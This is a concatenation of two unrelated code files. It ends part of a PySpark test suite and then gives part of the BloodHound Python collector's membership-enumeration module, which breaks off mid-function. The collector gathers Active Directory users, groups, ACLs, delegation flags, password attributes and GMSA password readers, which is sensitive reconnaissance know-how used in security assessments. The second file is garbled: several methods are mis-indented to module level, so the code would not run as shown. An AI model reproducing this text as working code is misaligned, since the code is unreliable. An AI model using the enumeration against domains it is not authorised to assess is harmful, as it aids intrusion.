            |   <groupId>%s</groupId>
            |   <artifactId>%s</artifactId>
            |   <version>%s</version>
            |</project>
            """ % (group_id, artifact_id, version)).lstrip(),
            os.path.join(group_id, artifact_id, version))
        self.createFileInZip("%s.py" % artifact_id, """
            |def myfunc(x):
            |    return x + 1
            """, ".jar", os.path.join(group_id, artifact_id, version),
            "%s-%s" % (artifact_id, version))
    def test_single_script(self):
        """Submit and test a single script file"""
        script = self.createTempFile("test.py", """
            |from pyspark import SparkContext
            |
            |sc = SparkContext()
            |print(sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect())
            """)
        proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
        out, err = proc.communicate()
        self.assertEqual(0, proc.returncode)
        self.assertIn("[2, 4, 6]", out.decode('utf-8'))
    def test_script_with_local_functions(self):
        """Submit and test a single script file calling a global function"""
        script = self.createTempFile("test.py", """
            |from pyspark import SparkContext
            |
            |def foo(x):
            |    return x * 3
            |
            |sc = SparkContext()
            |print(sc.parallelize([1, 2, 3]).map(foo).collect())
            """)
        proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
        out, err = proc.communicate()
        self.assertEqual(0, proc.returncode)
        self.assertIn("[3, 6, 9]", out.decode('utf-8'))
    def test_module_dependency(self):
        """Submit and test a script with a dependency on another module"""
        script = self.createTempFile("test.py", """
            |from pyspark import SparkContext
            |from mylib import myfunc
            |
            |sc = SparkContext()
            |print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
            """)
        zip = self.createFileInZip("mylib.py", """
            |def myfunc(x):
            |    return x + 1
            """)
        # --py-files distributes the zip to the executors.
        proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
                                stdout=subprocess.PIPE)
        out, err = proc.communicate()
        self.assertEqual(0, proc.returncode)
        self.assertIn("[2, 3, 4]", out.decode('utf-8'))
    def test_module_dependency_on_cluster(self):
        """Submit and test a script with a dependency on another module on a cluster"""
        script = self.createTempFile("test.py", """
            |from pyspark import SparkContext
            |from mylib import myfunc
            |
            |sc = SparkContext()
            |print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
            """)
        zip = self.createFileInZip("mylib.py", """
            |def myfunc(x):
            |    return x + 1
            """)
        proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
                                "local-cluster[1,1,1024]", script],
                                stdout=subprocess.PIPE)
        out, err = proc.communicate()
        self.assertEqual(0, proc.returncode)
        self.assertIn("[2, 3, 4]", out.decode('utf-8'))
    def test_package_dependency(self):
        """Submit and test a script with a dependency on a Spark Package"""
        script = self.createTempFile("test.py", """
            |from pyspark import SparkContext
            |from mylib import myfunc
            |
            |sc = SparkContext()
            |print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
            """)
        self.create_spark_package("a:mylib:0.1")
        # --repositories points Ivy at the fake local repo built above.
        proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
                                 "file:" + self.programDir, script], stdout=subprocess.PIPE)
        out, err = proc.communicate()
        self.assertEqual(0, proc.returncode)
        self.assertIn("[2, 3, 4]", out.decode('utf-8'))
    def test_package_dependency_on_cluster(self):
        """Submit and test a script with a dependency on a Spark Package on a cluster"""
        script = self.createTempFile("test.py", """
            |from pyspark import SparkContext
            |from mylib import myfunc
            |
            |sc = SparkContext()
            |print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
            """)
        self.create_spark_package("a:mylib:0.1")
        proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
                                 "file:" + self.programDir, "--master",
                                 "local-cluster[1,1,1024]", script], stdout=subprocess.PIPE)
        out, err = proc.communicate()
        self.assertEqual(0, proc.returncode)
        self.assertIn("[2, 3, 4]", out.decode('utf-8'))
    def test_single_script_on_cluster(self):
        """Submit and test a single script on a cluster"""
        script = self.createTempFile("test.py", """
            |from pyspark import SparkContext
            |
            |def foo(x):
            |    return x * 2
            |
            |sc = SparkContext()
            |print(sc.parallelize([1, 2, 3]).map(foo).collect())
            """)
        # this will fail if you have different spark.executor.memory
        # in conf/spark-defaults.conf
        proc = subprocess.Popen(
            [self.sparkSubmit, "--master", "local-cluster[1,1,1024]", script],
            stdout=subprocess.PIPE)
        out, err = proc.communicate()
        self.assertEqual(0, proc.returncode)
        self.assertIn("[2, 4, 6]", out.decode('utf-8'))
class ContextTests(unittest.TestCase):
    """Tests of SparkContext lifecycle: creation, stop(), `with`-statement
    semantics and the status tracker API."""

    def test_failed_sparkcontext_creation(self):
        # Regression test for SPARK-1550
        self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))

    def test_get_or_create(self):
        """getOrCreate() must return the already-active context."""
        with SparkContext.getOrCreate() as sc:
            self.assertTrue(SparkContext.getOrCreate() is sc)

    def test_parallelize_eager_cleanup(self):
        """parallelize() must not leave temp files behind after it returns."""
        with SparkContext() as sc:
            temp_files = os.listdir(sc._temp_dir)
            rdd = sc.parallelize([0, 1, 2])
            post_parallalize_temp_files = os.listdir(sc._temp_dir)
            self.assertEqual(temp_files, post_parallalize_temp_files)

    def test_set_conf(self):
        # This is for an internal use case. When there is an existing SparkContext,
        # SparkSession's builder needs to set configs into SparkContext's conf.
        sc = SparkContext()
        sc._conf.set("spark.test.SPARK16224", "SPARK16224")
        self.assertEqual(sc._jsc.sc().conf().get("spark.test.SPARK16224"), "SPARK16224")
        sc.stop()

    def test_stop(self):
        """stop() must clear the active-context singleton."""
        sc = SparkContext()
        self.assertNotEqual(SparkContext._active_spark_context, None)
        sc.stop()
        self.assertEqual(SparkContext._active_spark_context, None)

    def test_with(self):
        """Leaving a `with` block must stop the context."""
        with SparkContext() as sc:
            self.assertNotEqual(SparkContext._active_spark_context, None)
        self.assertEqual(SparkContext._active_spark_context, None)

    def test_with_exception(self):
        """The context must be stopped even when the `with` body raises."""
        try:
            with SparkContext() as sc:
                self.assertNotEqual(SparkContext._active_spark_context, None)
                raise Exception()
        except Exception:  # FIX: was a bare `except:`, which would also
            pass           # swallow KeyboardInterrupt/SystemExit
        self.assertEqual(SparkContext._active_spark_context, None)

    def test_with_stop(self):
        """An explicit stop() inside the `with` block must be harmless."""
        with SparkContext() as sc:
            self.assertNotEqual(SparkContext._active_spark_context, None)
            sc.stop()
        self.assertEqual(SparkContext._active_spark_context, None)

    def test_progress_api(self):
        """The status tracker must report job/stage info and cancellation."""
        with SparkContext() as sc:
            sc.setJobGroup('test_progress_api', '', True)
            rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100))

            def run():
                try:
                    rdd.count()
                except Exception:
                    pass
            t = threading.Thread(target=run)
            t.daemon = True
            t.start()
            # wait for scheduler to start
            time.sleep(1)

            tracker = sc.statusTracker()
            jobIds = tracker.getJobIdsForGroup('test_progress_api')
            self.assertEqual(1, len(jobIds))
            job = tracker.getJobInfo(jobIds[0])
            self.assertEqual(1, len(job.stageIds))
            stage = tracker.getStageInfo(job.stageIds[0])
            self.assertEqual(rdd.getNumPartitions(), stage.numTasks)

            sc.cancelAllJobs()
            t.join()
            # wait for event listener to update the status
            time.sleep(1)

            job = tracker.getJobInfo(jobIds[0])
            self.assertEqual('FAILED', job.status)
            self.assertEqual([], tracker.getActiveJobsIds())
            self.assertEqual([], tracker.getActiveStageIds())

            sc.stop()

    def test_startTime(self):
        with SparkContext() as sc:
            self.assertGreater(sc.startTime, 0)
class ConfTests(unittest.TestCase):
    def test_memory_conf(self):
        """spark.python.worker.memory must accept several unit suffixes."""
        for memory in ("1T", "1G", "1M", "1024K"):
            sc = SparkContext(conf=SparkConf().set("spark.python.worker.memory", memory))
            values = list(range(1024))
            random.shuffle(values)
            rdd = sc.parallelize(values, 4)
            self.assertEqual(sorted(values), rdd.sortBy(lambda x: x).collect())
            sc.stop()
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
    """General PySpark tests that depend on scipy """
    def test_serialize(self):
        # gammaln comes from a C extension; it must survive serialization
        # to the workers and produce the same values as a local call.
        from scipy.special import gammaln
        values = range(1, 5)
        expected = [gammaln(v) for v in values]
        observed = self.sc.parallelize(values).map(gammaln).collect()
        self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
    """General PySpark tests that depend on numpy """

    def test_statcounter_array(self):
        """stats() must aggregate element-wise over numpy array values."""
        x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
        s = x.stats()
        self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
        self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
        self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
        self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())

        # Population statistics (asDict default).
        stats_dict = s.asDict()
        self.assertEqual(3, stats_dict['count'])
        self.assertSequenceEqual([2.0, 2.0], stats_dict['mean'].tolist())
        self.assertSequenceEqual([1.0, 1.0], stats_dict['min'].tolist())
        self.assertSequenceEqual([3.0, 3.0], stats_dict['max'].tolist())
        self.assertSequenceEqual([6.0, 6.0], stats_dict['sum'].tolist())
        self.assertSequenceEqual([1.0, 1.0], stats_dict['stdev'].tolist())
        self.assertSequenceEqual([1.0, 1.0], stats_dict['variance'].tolist())

        # Sample statistics (denominator n instead of n-1 for stdev/variance).
        stats_sample_dict = s.asDict(sample=True)
        # BUG FIX: this previously re-checked stats_dict['count'] (copy-paste);
        # the sample dict is what is under test here.
        self.assertEqual(3, stats_sample_dict['count'])
        self.assertSequenceEqual([2.0, 2.0], stats_sample_dict['mean'].tolist())
        self.assertSequenceEqual([1.0, 1.0], stats_sample_dict['min'].tolist())
        self.assertSequenceEqual([3.0, 3.0], stats_sample_dict['max'].tolist())
        self.assertSequenceEqual([6.0, 6.0], stats_sample_dict['sum'].tolist())
        self.assertSequenceEqual(
            [0.816496580927726, 0.816496580927726], stats_sample_dict['stdev'].tolist())
        self.assertSequenceEqual(
            [0.6666666666666666, 0.6666666666666666], stats_sample_dict['variance'].tolist())
if __name__ == "__main__":
    from pyspark.tests import *
    # Print skip notices up front so they are visible before the test output.
    if not _have_scipy:
        print("NOTE: Skipping SciPy tests as it does not seem to be installed")
    if not _have_numpy:
        print("NOTE: Skipping NumPy tests as it does not seem to be installed")
    # Use the XML test runner (CI report collection) when available.
    if xmlrunner:
        unittest.main(testRunner=xmlrunner.XMLTestRunner(output='target/test-reports'))
    else:
        unittest.main()
    # NOTE(review): unittest.main() calls sys.exit() by default, so the two
    # notices below appear to be unreachable dead code — confirm and consider
    # removing them (or passing exit=False above if they are intended to run).
    if not _have_scipy:
        print("NOTE: SciPy tests were skipped as it does not seem to be installed")
    if not _have_numpy:
        print("NOTE: NumPy tests were skipped as it does not seem to be installed")
|
memberships.py | ####################
#
# Copyright (c) 2018 Fox-IT
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
####################
import logging
import queue
import threading
import calendar
from bloodhound.ad.utils import ADUtils, AceResolver
from bloodhound.ad.computer import ADComputer
from bloodhound.ad.structures import LDAP_SID
from bloodhound.enumeration.acls import AclEnumerator, parse_binary_acl
from bloodhound.enumeration.outputworker import OutputWorker
class MembershipEnumerator(object):
"""
Class to enumerate memberships in the domain.
    Contains the dumping functions which use
    methods from the bloodhound.ad module.
"""
    def __init__(self, addomain, addc, collect, disable_pooling):
        """
        Membership enumeration. Enumerates all groups/users/other memberships.

        addomain: AD domain object whose members are enumerated.
        addc: domain controller connection used for the LDAP queries.
        collect: collection methods requested (e.g. 'objectprops', 'acl').
        disable_pooling: if True, parse ACLs inline instead of in a worker
            pool (useful for debugging, since pooling hides exceptions).
        """
        self.addomain = addomain
        self.addc = addc
        # Store collection methods specified
        self.collect = collect
        self.disable_pooling = disable_pooling
        # Helpers for ACL enumeration and ACE resolution.
        self.aclenumerator = AclEnumerator(addomain, addc, collect)
        self.aceresolver = AceResolver(addomain, addomain.objectresolver)
        # Output queue; created fresh for each enumeration run.
        self.result_q = None
    def get_membership(self, member):
        """
        Attempt to resolve the membership (DN) of a group to an object.

        Returns a BloodHound member dict (ObjectIdentifier/ObjectType),
        or None if the DN cannot be resolved at all.
        """
        # First assume it is a user
        try:
            resolved_entry = self.addomain.users[member]
        except KeyError:
            # Try if it is a group
            try:
                resolved_entry = self.addomain.groups[member]
            except KeyError:
                # Try if it is a computer
                try:
                    entry = self.addomain.computers[member]
                    # Computers are stored as raw entries
                    resolved_entry = ADUtils.resolve_ad_entry(entry)
                except KeyError:
                    # Not in any cache: fall back to an LDAP query.
                    # use_gc presumably selects the Global Catalog when the DN
                    # belongs to a different domain — confirm in objectresolver.
                    use_gc = ADUtils.ldap2domain(member) != self.addomain.domain
                    qobject = self.addomain.objectresolver.resolve_distinguishedname(member, use_gc=use_gc)
                    if qobject is None:
                        return None
                    resolved_entry = ADUtils.resolve_ad_entry(qobject)
                    # Store it in the cache
                    if resolved_entry['type'] == 'User':
                        self.addomain.users[member] = resolved_entry
                    if resolved_entry['type'] == 'Group':
                        self.addomain.groups[member] = resolved_entry
                    # Computers are stored as raw entries
                    if resolved_entry['type'] == 'Computer':
                        self.addomain.computers[member] = qobject
        return {
            "ObjectIdentifier": resolved_entry['objectid'],
            "ObjectType": resolved_entry['type'].capitalize()
        }
@staticmethod
def get_primary_membership(entry):
"""
Construct primary membership from RID to SID (BloodHound 3.0 only)
"""
try:
primarygroupid = int(entry['attributes']['primaryGroupID'])
except (TypeError, KeyError):
# Doesn't have a primarygroupid, means it is probably a Group instead of a user
return None
return '%s-%d' % ('-'.join(entry['attributes']['objectSid'].split('-')[:-1]), primarygroupid)
    @staticmethod
    def add_user_properties(user, entry):
        """
        Resolve properties for user objects.

        Mutates user['Properties'] in place based on the LDAP entry attributes.
        """
        props = user['Properties']
        # print entry
        # Is user enabled? Checked by seeing if the UAC flag 2 (ACCOUNT_DISABLED) is not set
        props['enabled'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 2 == 0
        # Logon/password timestamps converted from Windows timestamps to unix epoch.
        props['lastlogon'] = ADUtils.win_timestamp_to_unix(
            ADUtils.get_entry_property(entry, 'lastLogon', default=0, raw=True)
        )
        props['lastlogontimestamp'] = ADUtils.win_timestamp_to_unix(
            ADUtils.get_entry_property(entry, 'lastlogontimestamp', default=0, raw=True)
        )
        # 0 (attribute missing / never set) is exported as -1.
        if props['lastlogontimestamp'] == 0:
            props['lastlogontimestamp'] = -1
        props['pwdlastset'] = ADUtils.win_timestamp_to_unix(
            ADUtils.get_entry_property(entry, 'pwdLastSet', default=0, raw=True)
        )
        # userAccountControl bit tests; flag values per the Microsoft UAC docs:
        # 0x00400000 DONT_REQ_PREAUTH, 0x00010000 DONT_EXPIRE_PASSWORD,
        # 0x00100000 NOT_DELEGATED ("account is sensitive").
        props['dontreqpreauth'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00400000 == 0x00400000
        props['pwdneverexpires'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00010000 == 0x00010000
        props['sensitive'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00100000 == 0x00100000
        props['serviceprincipalnames'] = ADUtils.get_entry_property(entry, 'servicePrincipalName', [])
        props['hasspn'] = len(props['serviceprincipalnames']) > 0
        props['displayname'] = ADUtils.get_entry_property(entry, 'displayName')
        props['email'] = ADUtils.get_entry_property(entry, 'mail')
        props['title'] = ADUtils.get_entry_property(entry, 'title')
        props['homedirectory'] = ADUtils.get_entry_property(entry, 'homeDirectory')
        props['description'] = ADUtils.get_entry_property(entry, 'description')
        props['userpassword'] = ADUtils.ensure_string(ADUtils.get_entry_property(entry, 'userPassword'))
        props['admincount'] = ADUtils.get_entry_property(entry, 'adminCount', 0) == 1
        # Only emit allowedtodelegate when the attribute is non-empty.
        if len(ADUtils.get_entry_property(entry, 'msDS-AllowedToDelegateTo', [])) > 0:
            props['allowedtodelegate'] = ADUtils.get_entry_property(entry, 'msDS-AllowedToDelegateTo', [])
        props['sidhistory'] = [LDAP_SID(bsid).formatCanonical() for bsid in ADUtils.get_entry_property(entry, 'sIDHistory', [])]
        # v4 props
        # whencreated may come back as an int or a datetime-like object;
        # normalize to epoch seconds either way.
        whencreated = ADUtils.get_entry_property(entry, 'whencreated', default=0)
        if isinstance(whencreated, int):
            props['whencreated'] = whencreated
        else:
            props['whencreated'] = calendar.timegm(whencreated.timetuple())
        props['unixpassword'] = ADUtils.ensure_string(ADUtils.get_entry_property(entry, 'unixuserpassword'))
        props['unicodepassword'] = ADUtils.ensure_string(ADUtils.get_entry_property(entry, 'unicodepwd'))
        # Non-default schema?
        # props['sfupassword'] = ADUtils.ensure_string(ADUtils.get_entry_property(entry, 'msSFU30Password'))
        props['sfupassword'] = None
    def enumerate_users(self, timestamp=""):
        """
        Enumerate all users in the domain and write them to <timestamp>users.json.

        Results stream from LDAP; JSON output is written by a separate worker
        thread, and ACL parsing (when collected) runs in a process pool unless
        disable_pooling is set.
        """
        filename = timestamp + 'users.json'
        # Should we include extra properties in the query?
        with_properties = 'objectprops' in self.collect
        acl = 'acl' in self.collect
        entries = self.addc.get_users(include_properties=with_properties, acl=acl)
        logging.debug('Writing users to file: %s', filename)
        # Use a separate queue for processing the results
        self.result_q = queue.Queue()
        # Writer thread: drains result_q and streams records to the JSON file.
        results_worker = threading.Thread(target=OutputWorker.membership_write_worker, args=(self.result_q, 'users', filename))
        results_worker.daemon = True
        results_worker.start()
        if acl and not self.disable_pooling:
            self.aclenumerator.init_pool()
        # This loops over a generator, results are fetched from LDAP on the go
        for entry in entries:
            resolved_entry = ADUtils.resolve_ad_entry(entry)
            # Skip trust objects
            if resolved_entry['type'] == 'trustaccount':
                continue
            user = {
                "AllowedToDelegate": [],
                "ObjectIdentifier": ADUtils.get_entry_property(entry, 'objectSid'),
                "PrimaryGroupSID": MembershipEnumerator.get_primary_membership(entry),
                "Properties": {
                    "name": resolved_entry['principal'],
                    "domain": self.addomain.domain.upper(),
                    "domainsid": self.addomain.domain_object.sid,
                    "distinguishedname":ADUtils.get_entry_property(entry, 'distinguishedName').upper(),
                    "unconstraineddelegation": ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00080000 == 0x00080000,
                    "trustedtoauth": ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x01000000 == 0x01000000,
                    "passwordnotreqd": ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00000020 == 0x00000020
                },
                "Aces": [],
                "SPNTargets": [],
                "HasSIDHistory": [],
                "IsDeleted": ADUtils.get_entry_property(entry, 'isDeleted', default=False)
            }
            if with_properties:
                MembershipEnumerator.add_user_properties(user, entry)
                # Resolve constrained-delegation targets (host part of the SPN)
                # to SIDs via the computer SID cache.
                if 'allowedtodelegate' in user['Properties']:
                    for host in user['Properties']['allowedtodelegate']:
                        try:
                            target = host.split('/')[1]
                        except IndexError:
                            logging.warning('Invalid delegation target: %s', host)
                            continue
                        try:
                            sid = self.addomain.computersidcache.get(target.lower())
                            user['AllowedToDelegate'].append(sid)
                        except KeyError:
                            # Not in the cache; keep FQDN-looking targets as-is.
                            if '.' in target:
                                user['AllowedToDelegate'].append(target.upper())
                # Parse SID history
                if len(user['Properties']['sidhistory']) > 0:
                    for historysid in user['Properties']['sidhistory']:
                        user['HasSIDHistory'].append(self.aceresolver.resolve_sid(historysid))
            # If this is a GMSA, process its ACL. We don't bother with threads/processes here
            # since these accounts shouldn't be that common and neither should they have very complex
            # DACLs which control who can read their password
            if ADUtils.get_entry_property(entry, 'msDS-GroupMSAMembership', default=b'', raw=True) != b'':
                self.parse_gmsa(user, entry)
            self.addomain.users[entry['dn']] = resolved_entry
            # If we are enumerating ACLs, we break out of the loop here
            # this is because parsing ACLs is computationally heavy and therefore is done in subprocesses
            if acl:
                if self.disable_pooling:
                    # Debug mode, don't run this pooled since it hides exceptions
                    self.process_acldata(parse_binary_acl(user, 'user', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map))
                else:
                    # Process ACLs in separate processes, then call the processing function to resolve entries and write them to file
                    self.aclenumerator.pool.apply_async(parse_binary_acl, args=(user, 'user', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map), callback=self.process_acldata)
            else:
                # Write it to the queue -> write to file in separate thread
                # this is solely for consistency with acl parsing, the performance improvement is probably minimal
                self.result_q.put(user)
        self.write_default_users()
        # If we are parsing ACLs, close the parsing pool first
        # then close the result queue and join it
        if acl and not self.disable_pooling:
            self.aclenumerator.pool.close()
            self.aclenumerator.pool.join()
            self.result_q.put(None)
        else:
            self.result_q.put(None)
        self.result_q.join()
        logging.debug('Finished writing users')
def enumerate_groups(self, timestamp=""):
    """
    Enumerate AD group objects and stream them to <timestamp>groups.json.

    A background worker thread consumes self.result_q and writes the file.
    When 'acl' collection is enabled, the computationally heavy binary ACL
    parsing is dispatched to a process pool (unless self.disable_pooling is
    set for debugging, in which case it runs inline so exceptions surface).
    """
    # Built-in high-value group SIDs (Administrators, Server/Print/Backup
    # Operators, Account Operators).
    highvalue = ["S-1-5-32-544", "S-1-5-32-550", "S-1-5-32-549", "S-1-5-32-551", "S-1-5-32-548"]

    def is_highvalue(sid):
        # NOTE(review): defined but not referenced anywhere in this method;
        # presumably a leftover from a version that set a 'highvalue'
        # property on groups — confirm before removing.
        if sid.endswith("-512") or sid.endswith("-516") or sid.endswith("-519") or sid.endswith("-520"):
            return True
        if sid in highvalue:
            return True
        return False

    # Should we include extra properties in the query?
    with_properties = 'objectprops' in self.collect
    acl = 'acl' in self.collect
    filename = timestamp + 'groups.json'
    entries = self.addc.get_groups(include_properties=with_properties, acl=acl)
    logging.debug('Writing groups to file: %s', filename)
    # Use a separate queue for processing the results
    self.result_q = queue.Queue()
    results_worker = threading.Thread(target=OutputWorker.membership_write_worker, args=(self.result_q, 'groups', filename))
    results_worker.daemon = True
    results_worker.start()
    if acl and not self.disable_pooling:
        self.aclenumerator.init_pool()
    for entry in entries:
        resolved_entry = ADUtils.resolve_ad_entry(entry)
        self.addomain.groups[entry['dn']] = resolved_entry
        try:
            sid = entry['attributes']['objectSid']
        except KeyError:
            # Somehow we found a group without a sid?
            logging.warning('Could not determine SID for group %s', entry['attributes']['distinguishedName'])
            continue
        group = {
            "ObjectIdentifier": sid,
            "Properties": {
                "domain": self.addomain.domain.upper(),
                "domainsid": self.addomain.domain_object.sid,
                "name": resolved_entry['principal'],
                "distinguishedname": ADUtils.get_entry_property(entry, 'distinguishedName').upper()
            },
            "Members": [],
            "Aces": [],
            "IsDeleted": ADUtils.get_entry_property(entry, 'isDeleted', default=False)
        }
        if sid in ADUtils.WELLKNOWN_SIDS:
            # Well-known SIDs are not unique across domains;
            # prefix it with the domain to disambiguate.
            group['ObjectIdentifier'] = '%s-%s' % (self.addomain.domain.upper(), sid)
        if with_properties:
            group['Properties']['admincount'] = ADUtils.get_entry_property(entry, 'adminCount', default=0) == 1
            group['Properties']['description'] = ADUtils.get_entry_property(entry, 'description')
            whencreated = ADUtils.get_entry_property(entry, 'whencreated', default=0)
            # Stored as a unix timestamp (UTC).
            group['Properties']['whencreated'] = calendar.timegm(whencreated.timetuple())
        for member in entry['attributes']['member']:
            resolved_member = self.get_membership(member)
            if resolved_member:
                group['Members'].append(resolved_member)
        # If we are enumerating ACLs, we branch here: parsing ACLs is
        # computationally heavy and therefore done in subprocesses.
        if acl:
            if self.disable_pooling:
                # Debug mode, don't run this pooled since it hides exceptions
                self.process_acldata(parse_binary_acl(group, 'group', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map))
            else:
                # Process ACLs in separate processes, then call the processing function to resolve entries and write them to file
                self.aclenumerator.pool.apply_async(parse_binary_acl, args=(group, 'group', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map), callback=self.process_acldata)
        else:
            # Write it to the queue -> write to file in separate thread
            # this is solely for consistency with acl parsing, the performance improvement is probably minimal
            self.result_q.put(group)
    self.write_default_groups()
    # If we are parsing ACLs, close the parsing pool first (so all pending
    # callbacks have run), then signal the writer with the None sentinel.
    if acl and not self.disable_pooling:
        self.aclenumerator.pool.close()
        self.aclenumerator.pool.join()
        self.result_q.put(None)
    else:
        self.result_q.put(None)
    self.result_q.join()
    logging.debug('Finished writing groups')
def enumerate_computers_dconly(self, timestamp=""):
    '''
    Enumerate computer objects. This function is only used if no
    collection was requested that required connecting to computers anyway.

    Works entirely from the cached LDAP entries (self.addc.ad.computers)
    and streams results to <timestamp>computers.json via a writer thread,
    mirroring the queue/pool pattern of enumerate_users/enumerate_groups.
    '''
    filename = timestamp + 'computers.json'
    acl = 'acl' in self.collect
    entries = self.addc.ad.computers.values()
    logging.debug('Writing computers ACL to file: %s', filename)
    # Use a separate queue for processing the results
    self.result_q = queue.Queue()
    results_worker = threading.Thread(target=OutputWorker.membership_write_worker, args=(self.result_q, 'computers', filename))
    results_worker.daemon = True
    results_worker.start()
    if acl and not self.disable_pooling:
        self.aclenumerator.init_pool()
    # This loops over the cached entries
    for entry in entries:
        # Skip cache records that never got LDAP attributes or a hostname.
        if not 'attributes' in entry:
            continue
        if 'dNSHostName' not in entry['attributes']:
            continue
        hostname = entry['attributes']['dNSHostName']
        if not hostname:
            continue
        samname = entry['attributes']['sAMAccountName']
        cobject = ADComputer(hostname=hostname, samname=samname, ad=self.addomain, addc=self.addc, objectsid=entry['attributes']['objectSid'])
        cobject.primarygroup = MembershipEnumerator.get_primary_membership(entry)
        # skip_acl=True: ACLs are handled below (pooled or inline).
        computer = cobject.get_bloodhound_data(entry, self.collect, skip_acl=True)
        # Parsing ACLs is computationally heavy and therefore done in subprocesses.
        if acl:
            if self.disable_pooling:
                # Debug mode, don't run this pooled since it hides exceptions
                self.process_acldata(parse_binary_acl(computer, 'computer', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map))
            else:
                # Process ACLs in separate processes, then call the processing function to resolve entries and write them to file
                self.aclenumerator.pool.apply_async(parse_binary_acl, args=(computer, 'computer', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map), callback=self.process_acldata)
        else:
            # Write it to the queue -> write to file in separate thread
            # this is solely for consistency with acl parsing, the performance improvement is probably minimal
            self.result_q.put(computer)
    # If we are parsing ACLs, close the parsing pool first
    # then close the result queue and join it
    if acl and not self.disable_pooling:
        self.aclenumerator.pool.close()
        self.aclenumerator.pool.join()
        self.result_q.put(None)
    else:
        self.result_q.put(None)
    self.result_q.join()
    logging.debug('Finished writing computers')
def parse_gmsa(self, user, entry):
    """
    Parse the GMSA membership DACL (msDS-GroupMSAMembership), which encodes
    which principals may read this account's managed password, and record
    each non-Owner grant as a ReadGMSAPassword ACE on the user object.
    """
    raw_sd = ADUtils.get_entry_property(entry, 'msDS-GroupMSAMembership', raw=True)
    _, raw_aces = parse_binary_acl(user, 'user', raw_sd, self.addc.objecttype_guid_map)
    for resolved_ace in self.aceresolver.resolve_aces(raw_aces):
        # Ownership of the security descriptor does not grant password reads.
        if resolved_ace['RightName'] == 'Owner':
            continue
        resolved_ace['RightName'] = 'ReadGMSAPassword'
        user['Aces'].append(resolved_ace)
def process_acldata(self, result):
    """
    Callback for finished (pooled or inline) ACL parsing: resolve the raw
    ACEs into principals, append them to the object's Aces list, and hand
    the enriched object to the output queue.
    """
    obj, raw_aces = result
    resolved = self.aceresolver.resolve_aces(raw_aces)
    obj['Aces'].extend(resolved)
    self.result_q.put(obj)
def write_default_users(self):
    """
    Emit the well-known NT AUTHORITY built-in account to the users output
    queue, so the dataset always contains it even though LDAP does not
    return it as a regular user object.
    """
    domainsid = self.addomain.domain_object.sid
    domainname = self.addomain.domain.upper()
    user = {
        "AllowedToDelegate": [],
        # Well-known SID, prefixed with the domain name to disambiguate.
        "ObjectIdentifier": "%s-S-1-5-20" % domainname,
        "PrimaryGroupSID": None,
        "Properties": {
            "domain": domainname,
            # Bug fix: `domainsid` was computed but unused while the dict
            # re-read the attribute inline; use the local consistently.
            "domainsid": domainsid,
            "name": "NT AUTHORITY@%s" % domainname,
        },
        "Aces": [],
        "SPNTargets": [],
        "HasSIDHistory": [],
        "IsDeleted": False,
        "IsACLProtected": False,
    }
    self.result_q.put(user)
def write_default_groups(self):
    """
    Put the default (well-known) groups in the groups.json output queue:
    ENTERPRISE DOMAIN CONTROLLERS (with the actual DCs as members),
    EVERYONE, AUTHENTICATED USERS and INTERACTIVE. LDAP does not return
    these as regular group objects, so they are synthesized here.
    """
    # Domain controllers live under the forest root domain.
    rootdomain = self.addc.get_root_domain().upper()
    entries = self.addc.get_domain_controllers()
    group = {
        "IsDeleted": False,
